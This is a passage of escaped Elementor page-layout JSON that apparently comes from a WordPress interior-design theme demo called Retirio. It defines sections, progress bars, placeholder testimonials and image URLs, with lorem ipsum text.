<\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\",\"target_blank\":\"\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon 